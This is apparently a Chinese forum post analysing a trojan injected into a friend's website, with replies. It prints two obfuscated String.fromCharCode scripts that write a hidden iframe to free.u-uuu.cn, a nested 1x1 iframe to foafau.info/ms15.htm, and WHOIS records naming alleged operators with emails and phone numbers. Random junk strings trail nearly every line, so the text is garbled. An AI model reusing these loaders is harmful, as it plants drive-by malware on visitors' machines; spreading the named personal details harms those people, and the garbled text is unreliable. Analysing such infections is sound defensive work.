[原创]一篇刚写的分析木马手记

首发在我的博客里面， :@Dos'0Px  
PQ"%Z.F"  
http://www.areway.cn/?p=175 "s<lLgi  
b{>dOI*.}  
~%:p_td  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： T>%ny\?tHW  
          A":b_!sW  
<script>t=’60,105,102,114,97,109,101, V"jnrNs3  
32,115,114,99,61,104,116,116,112,58,47,47, Lbp6I0&n  
102,114,101,101,46,117,45,117,117,117,46,99, qML*Kwg  
110,47,101,114,114,111,114,46,104,116,109, AHD%6 \$  
32,119,105,100,116,104,61,49,48,48,32,104, c+/C7C o  
101,105,103,104,116,61,48,62,60,47,105,102, /(pChY>  
114,97,109,101,62′; * .VZ(wX  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> *Y0,d`  
                                                                                                  s;WCz  
<script>t=’60,105,102,114,97,109,101,32,115, swL|Ff`$  
114,99,61,104,116,116,112,58,47,47,102,114, z35Rjhj9  
101,101,46,117,45,117,117,117,46,99,110,47, {leG~[d  
101,114,114,111,114,46,104,116,109,32,119, ymX,k|lh  
105,100,116,104,61,49,48,48,32,104,101,105, :Ia&,;Gc  
103,104,116,61,48,62,60,47,105,102,114,97, xG/qDc  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); S5a<L_  
document.write(t);</script> NP*0WT_gB  
                                                                                                  dKpa5f7  
<html xmlns=” hP<qKVy  
http://www.w3.org/1999/xhtml #'h CohL  
“> ]sAD5<;  
<head> ScoHtX3  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> Nb/%>3O@  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> =W*`HV-w  
<title>首页 - 爱生活家庭网 S`w)b'B!M  
                                                                                                                                                    S,RJ#.:F[t  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 p;=(-4\V}  
转换字符串后的大概内容是（谁点击后果自付）： y<d#sv(s  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… ~'=4K/39  
                                                                                                                                  {U-EBXV  
查询玉米u-uuu.cn的详细信息： )6+W6:  
Domain Name: u-uuu.cn htym4\Z=  
ROID: 20070901s10001s64972306-cn UdJV;T'rm  
Domain Status: ok cSk}53  
Registrant Organization: 王雷 V7_??L%Ct`  
Registrant Name: 王雷 cpnwx1q@  
Administrative Email: czlovexs@126.com :zRboqe(cc  
Sponsoring Registrar: 北京万网志成科技有限公司
nB0ol-<  
Name Server:ns.yovole.com {2@96o2}  
Name Server:ns1.yovole.com I0RWdOK8K  
Registration Date: 2007-09-01 17:54 X&Lt?e,&  
Expiration Date: 2008-09-01 17:54 1hij4m$b  
最后PING了一下地址 都没有什么…. )aSkUytg"  
                                                                                                $8r:&Iw  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. Q2?qvNZ  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> vrbh+  
<script language=”javascript” src=” O_^h 7   
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script ;xwQzu%M>5  
> M7 !" t  
这个玉米应该有可能是木马作者的： Lai"D[N  
foafau.info的详细信息： IhLfuyFWu  
Access to INFO WHOIS information is provided to assist persons in !d(V7`8  
determining the contents of a domain name registration record in the kM`#U *j  
Afilias registry database. The data in this record is provided by :TI1tJS~*  
Afilias Limited for informational purposes only, and Afilias does not oVW?d]R  
guarantee its accuracy.  This service is intended only for query-based 7<D_ h/WV  
access. You agree that you will use this data only for lawful purposes EA.U>5Fq  
and that, under no circumstances will you use this data to: (a) allow, (xL=X%6a  
enable, or otherwise support the transmission by e-mail, telephone, or Xk'.t|  
facsimile of mass unsolicited, commercial advertising or solicitations Vk-_H)*r  
to entities other than the data recipient’s own existing customers; or <H6Uo#ao  
(b) enable high volume, automated, electronic processes that send ^h=kJR9  
queries or data to the systems of Registry Operator, a Registrar, or I]X<L2  
Afilias except as reasonably necessary to register domain names or Di*>PE
@  
modify existing registrations. All rights reserved. Afilias reserves }R$%M
U5::  
the right to modify these terms at any time. By submitting this query, 2|BE{91  
you agree to abide by this policy. d%bL_I)  
Domain ID:D22418703-LRMS if>] )g2lr  
Domain Name:FOAFAU.INFO 'oG'`ED"  
Created On:20-Nov-2007 16:05:42 UTC 4a-wGx#h  
Last Updated On:20-Nov-2007 16:05:44 UTC qv6]YPP  
Expiration Date:20-Nov-2008 16:05:42 UTC UlrY  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
M &J*I  
Status:CLIENT DELETE PROHIBITED {y'kwU  
Status:CLIENT RENEW PROHIBITED =%LS9e^7D  
Status:CLIENT TRANSFER PROHIBITED u2QJDLMJv  
Status:CLIENT UPDATE PROHIBITED xh0!H| R  
Status:TRANSFER PROHIBITED V EzIWNV  
Registrant ID:GODA-040110615 71_N9ub@z  
Registrant Name:liu hong $`%.Y&A  
Registrant Organization: ']Z8C)tK  
Registrant Street1:beijing [z\*Zg  
Registrant Street2: \Z8!iruN  
Registrant Street3: &D:88   
Registrant City:beijing M:x(_Lu  
Registrant State/Province: k4v[2y`  
Registrant Postal Code:100000 O);V{1P  
Registrant Country:CN -IE;5f#e  
Registrant Phone:+86.860108888777 ^s5)FdF8  
Registrant Phone Ext.: _),@^^&x  
Registrant FAX: K\G|q}E/1  
Registrant FAX Ext.: o%:eYl  
Registrant Email:bbbshiji@163.com qcqf9g  
Admin ID:GODA-240110615 6o!"$IH4  
Admin Name:liu hong c!zu0\[Id  
Admin Organization: Jy9&=Qh   
Admin Street1:beijing AOpf
Byw  
Admin Street2: 9 wc=B(a|  
Admin Street3: [
eImP V]  
Admin City:beijing XZhhr1-<a  
Admin State/Province: 3jeR;N]x  
Admin Postal Code:100000 Nbr{)h  
Admin Country:CN &A~1Q#4  
Admin Phone:+86.860108888777 !
T}`h'  
Admin Phone Ext.: ?pFHpz  
Admin FAX: E)Dik`Ccl  
Admin FAX Ext.: @Z)&
3ss  
Admin Email:bbbshiji@163.com QFMS]  
Billing ID:GODA-340110615 =3FXU{"Qi4  
Billing Name:liu hong "QMHY\C  
Billing Organization: gbvBgOp  
Billing Street1:beijing *fE5Z;!}  
Billing Street2: `|gCbs95  
Billing Street3: &kP>qTI^p~  
Billing City:beijing x[]n\\a?  
Billing State/Province: Q
,scjt[  
Billing Postal Code:100000 PWTAy\  
Billing Country:CN Xh?{%?2  
Billing Phone:+86.860108888777 
$lvpBs  
Billing Phone Ext.: 6uDNqq  
Billing FAX: \eN}V  
Billing FAX Ext.: ;(z0r_p<q  
Billing Email:bbbshiji@163.com 44!bwXz8  
Tech ID:GODA-140110615 ZW2U9  
Tech Name:liu hong !aLL|}S  
Tech Organization: T3\Q<  
Tech Street1:beijing %.]qkG
Ze#  
Tech Street2: TtHqdKL  
Tech Street3: 1|2X0Xm{  
Tech City:beijing %N2=:;f  
Tech State/Province: h9No'!'!  
Tech Postal Code:100000 < d?O#(  
Tech Country:CN ^hU7QxW  
Tech Phone:+86.860108888777 U
c.K6%iI  
Tech Phone Ext.: $cc]pJy"}  
Tech FAX: +g(QF
  
Tech FAX Ext.: }=NjFK_6  
Tech Email:bbbshiji@163.com jfk`%CEk=  
Name Server:NS27.DOMAINCONTROL.COM nT:ZSJWM  
Name Server:NS28.DOMAINCONTROL.COM WUKYwA/t  
Name Server: h&&ufF]D  
Name Server: geua8;  
Name Server: @`)A
)  
Name Server: k5(@n>p  
Name Server: '(;`t1V8k  
Name Server: 3#
W>  
Name Server: Ve<l7U;  
Name Server: N\rbnr  
Name Server: fs\l*nBig  
Name Server: 2}K7(y!?u  
Name Server: Fe}Dnv)}Z  
                                                                                                          tQF,E&
Jo8  
接着下载每个文件里面的代码： I6~.sTl  
一步一步看.. +Uq$'2CT  
z.--"cF  
p1q"[)WVn^  
W-2,QVp
%  
ckS.j)@.c  
7?xTJN)G  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来